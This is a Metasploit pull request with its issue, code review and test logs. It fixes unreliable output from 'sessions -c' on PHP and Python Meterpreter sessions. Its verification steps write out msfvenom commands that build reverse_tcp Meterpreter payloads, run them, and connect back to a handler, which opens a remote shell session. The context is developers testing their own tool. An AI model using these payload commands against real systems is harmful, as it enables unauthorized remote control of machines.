### PR TITLE
Fix #15097, fix unreliable sessions -c output

### LINKED ISSUE #15097: php/meterpreter reverse_tcp unreliable execute
Having a reverse_tcp created with php payload, for example using a module that exploits a CMS/framework written in PHP, I observed command output is not always received by msf and showed to user. 

```
msf6 payload(php/meterpreter_reverse_tcp) > sessions -iq 1 -c 'find /var/www/ -name foo'
[*] Running 'find /var/www/ -name foo' on meterpreter session 1 (192.168.1.2)
/var/www/f/fo/foo

msf6 payload(php/meterpreter_reverse_tcp) > sessions -iq 1 -c 'find /var/www/ -name foo'
[*] Running 'find /var/www/ -name foo' on meterpreter session 1 (192.168.1.2)

msf6 payload(php/meterpreter_reverse_tcp) > sessions -iq 1 -c 'find /var/www/ -name foo'
[*] Running 'find /var/www/ -name foo' on meterpreter session 1 (192.168.1.2)

msf6 payload(php/meterpreter_reverse_tcp) > sessions -iq 1 -c 'find /var/www/ -name foo'
[*] Running 'find /var/www/ -name foo' on meterpreter session 1 (192.168.1.2)

msf6 payload(php/meterpreter_reverse_tcp) > sessions -iq 1 -c 'find /var/www/ -name foo'
[*] Running 'find /var/www/ -name foo' on meterpreter session 1 (192.168.1.2)
msf6 payload(php/meterpreter_reverse_tcp) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > execute -i -f find -a "/var/www/ -name foo"
Process 3547 created.
Channel 26 created.
/var/www/f/fo/foo
meterpreter > background
[*] Backgrounding session 1...
msf6 payload(php/meterpreter_reverse_tcp) > sessions -iq 1 -c 'find /var/www/ -name foo'
[*] Running 'find /var/www/ -name foo' on meterpreter session 1 (192.168.1.2)
```
I also run strace on the module and it seems to me that there is some misbehaviour with the read() call on command output, if you need strace output i can attach it or send privately.

running pspy on the host that runs the agent shows that the command runs.

Note: here you see single quotes around command, using double quotes doesn't change the behaviour

Target box is a stock centos8 with php run by php-fpm

## Steps to reproduce

1. exploit any PHP webapp using php/meterpreter_reverse_tcp or php/meterpreter/reverse_tcp payload
2. try to interact and run shell commands as described

## Expected behavior

I expect the command to always return output, if there is any

## Current behavior

Mostly the command gives 0 output, like 70% of times given a small number of test.

### Metasploit version

6.0.39-dev (Pro trial)
6.0.40-dev

### PR DESCRIPTION
**Pull request by timwr**
This change ensures `sessions -c` on meterpreter sessions behaves the same as cmd_exec, which means it will wait for the command output before displaying it.

## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] Get a python and a php session
- [x] `handler -p python/meterpreter/reverse_tcp -H 192.168.13.37 -P 4444`
- [x] `./msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.13.37 LPORT=4444 -o met.py && python met.py`
- [x] `handler -p php/meterpreter/reverse_tcp -H 192.168.13.37 -P 4444`
- [x] `./msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.13.37 LPORT=4444 -o met.php && php -f met.php`
- [x] **Verify** `sessions -c 'find /doesntexist'` always returns output
- [x] **Verify** `sessions -c 'echo start && sleep 1 && echo end'` always returns output
- [x] **Verify** the cmd_exec tests still pass, e.g:
```
loadpath test/modules
use post/test/cmd_exec
set SESSION -1
run
```

### CODE REVIEW

File: lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb [hunk 1]
```diff
@@ -319,6 +319,35 @@ def path
     return get_info()['path']
   end
 
+  #
+  # Read data from the process channel
+  #
+  def read_data(time_out_start = 0, time_out = -1)
```
Comment (smcintyre-r7) [inline lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb:325]: Would it make more sense for convention to implement the timeout functionality by adding [`#timed_read`](https://github.com/rapid7/rex-core/blob/master/lib/rex/io/stream.rb#L177) to [`Rex::Post::Meterpreter::Channels::Pools::StreamPool`](https://github.com/rapid7/metasploit-framework/blob/master/lib/rex/post/meterpreter/channels/pools/stream_pool.rb). That would provide a more consistent interface with other streams in the framework.

It looks like `#timed_read` might be raising an exception though, in which case [`#get`](https://github.com/rapid7/rex-core/blob/master/lib/rex/io/stream.rb#L232) might be more similar to what we need here.

The caller would still need to chomp and close though like they're doing now.

Comment (acammack-r7) [inline lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb:325]: Since this calls `close` on the command channel, maybe this should be named something like `capture_output` as a reference to the `Open3.capture*` methods?

Comment (smcintyre-r7) [reply lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb:325]: I'm going to mark this as resolved and instead favor the [other](https://github.com/rapid7/metasploit-framework/pull/15111#discussion_r623121630) approach.

Comment (smcintyre-r7) [reply lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb:325]: This sounds alot cleaner than what I was thinking. If this is always reading until close, that would also mean that the `time_out_start` parameter probably isn't necessary since this won't be called repeatedly. Right now both callers are just initializing it to the current time.

**Comment by smcintyre-r7** [comment]
I was able to reproduce the original issue. In this test output, it shows that it's not waiting for the sleep and "end" to be echoed which is incorrect.

```
msf6 payload(python/meterpreter/reverse_tcp) > sessions -c 'echo start && sleep 1 && echo end'
[*] Running 'echo start && sleep 1 && echo end' on meterpreter session 1 (192.168.159.128)
start

[*] Running 'echo start && sleep 1 && echo end' on meterpreter session 2 (192.168.159.128)
start

msf6 payload(python/meterpreter/reverse_tcp) >
```

Then with these changes, it does wait for the sleep correctly and all of the other tests pass as well.

```
msf6 payload(python/meterpreter/reverse_tcp) > sessions

Active sessions
===============

  Id  Name  Type                      Information                               Connection
  --  ----  ----                      -----------                               ----------
  1         meterpreter php/linux     smcintyre (1000) @ localhost.localdomain  192.168.159.128:4444 -> 192.168.159.128:52966 (192.168.159.128)
  2         meterpreter python/linux  smcintyre @ localhost.localdomain         192.168.159.128:4444 -> 192.168.159.128:52982 (192.168.159.128)

msf6 payload(python/meterpreter/reverse_tcp) > sessions -c 'find /doesntexist'
[*] Running 'find /doesntexist' on meterpreter session 1 (192.168.159.128)
find: ‘/doesntexist’: No such file or directory
[*] Running 'find /doesntexist' on meterpreter session 2 (192.168.159.128)
find: ‘/doesntexist’: No such file or directory
msf6 payload(python/meterpreter/reverse_tcp) > sessions -c 'echo start && sleep 1 && echo end'
[*] Running 'echo start && sleep 1 && echo end' on meterpreter session 1 (192.168.159.128)
start
end
[*] Running 'echo start && sleep 1 && echo end' on meterpreter session 2 (192.168.159.128)
start
end
msf6 payload(python/meterpreter/reverse_tcp) > loadpath test/modules
Loaded 1 modules:
    1 post modules
msf6 payload(python/meterpreter/reverse_tcp) > use post/test/cmd_exec
msf6 post(test/cmd_exec) > set SESSION 1
SESSION => 1
msf6 post(test/cmd_exec) > run

[*] Running against session 1
[*] Session type is meterpreter and platform is linux
[+] should return the result of echo with single quotes
[+] should return the result of echo with double quotes
[+] should return the stderr output
[+] should return the result of echo
[+] should return the full response after sleeping
[+] should return the full response after sleeping
[+] should return the result of echo 10 times
[*] Passed: 7; Failed: 0
[*] Post module execution completed
msf6 post(test/cmd_exec) > set SESSION 2
SESSION => 2
msf6 post(test/cmd_exec) > run

[*] Running against session 2
[*] Session type is meterpreter and platform is linux
[+] should return the result of echo with single quotes
[+] should return the result of echo with double quotes
[+] should return the stderr output
[+] should return the result of echo
[+] should return the full response after sleeping
[+] should return the full response after sleeping
[+] should return the result of echo 10 times
[*] Passed: 7; Failed: 0
[*] Post module execution completed
msf6 post(test/cmd_exec) >
```

I'll get this merged in now. Thanks a lot @timwr !

**Comment by smcintyre-r7** [comment]
# Release Notes
This fixes an issue in how some Meterpreter session types would inconsistently run commands issued through `sessions -c`.

File: lib/msf/core/post/common.rb [hunk 2]
```diff
@@ -105,34 +105,12 @@ def cmd_exec(cmd, args=nil, time_out=15)
...
-      o.chomp! if o
-
-      begin
-        process.channel.close
-      rescue IOError => e
-        # Channel was already closed, but we got the cmd output, so let's soldier on.
-      end
-
-      process.close
+      o = session.sys.process.capture_output(cmd, args, {'Hidden' => true, 'Channelized' => true, 'Subshell' => true })
```
Comment (FunnyWolf) [inline lib/msf/core/post/common.rb:113]: params `time_out` is just set to session.response_timeout but not send to function `capture_output` ,as the result `cmd_exec` time_out is always 15.
